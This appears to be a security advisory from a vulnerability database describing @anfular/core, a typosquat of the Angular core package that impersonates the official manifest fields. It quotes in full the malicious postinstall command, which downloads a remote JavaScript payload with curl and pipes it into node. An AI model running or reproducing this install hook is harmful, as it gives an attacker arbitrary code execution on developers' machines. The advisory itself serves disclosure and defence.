@anfular/core@22.2.1
Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 7:27 AM UTC
OSV ID
MAL-2026-17533
Ecosystem
npm
Summary
Package @anfular/core@22.2.1 is a one-character typosquat of @angular/core, with manifest fields impersonating the official Angular package (scope @anfular, description 'Angular - the core framework', author 'angular', repository pointing at github.com/angular/angular). The package.json postinstall script runs 'curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node', downloading an unpinned JavaScript payload from an attacker-controlled gitflic.ru URL (fronted by a web.archive.org wrapper) and piping it directly into node for execution on the installer's machine at npm install time. The fetched code is unverified, unpinned, hosted off any official registry or publisher-matched domain, and executed with the installer's privileges, giving the author arbitrary code execution on every machine that installs the package.
Source: amazon-inspector (eefc706854c122c96c898da5d4db285f26e31430f25451e5d1073a31db5e5341)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.